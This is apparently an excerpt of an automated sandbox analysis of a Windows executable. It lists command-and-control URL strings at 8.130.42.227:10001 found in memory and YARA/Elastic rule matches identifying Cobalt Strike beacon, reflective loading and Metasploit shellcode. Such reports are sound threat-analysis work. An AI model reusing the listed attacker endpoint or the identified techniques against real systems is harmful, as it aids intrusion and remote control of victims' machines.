            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMeP
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMeq7
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3120649557.0000000000195000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2486331927.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3031168430.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2132660259.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3065050959.0000000000197000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2475694262.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2949804872.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2099991629.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2984468347.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2973424175.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3019731119.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2454151218.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2034975123.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3042669093.0000000000195000.00000004.00000020.00020000.00000000.sdmp, 
7kSftA4Eoh.exe, 00000000.00000003.2357124729.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2056644230.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js#?
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497532252.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js0
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125724436.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js3
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2639548955.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2018585370.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2324563494.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js5
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js:
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js=?
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js=D
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357124729.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2335515707.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2346423893.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js?
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsB4
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsJ4
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsR4
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsSessionKeyBackward
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2188573468.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsT
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsU
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsWindows
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsdo
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsdob4k
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsm
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2132660259.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2056644230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsn
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssi
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssiZ4#
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssij4s

            System Summary

            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE080 CreateProcessAsUserA,0_2_009BE080
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
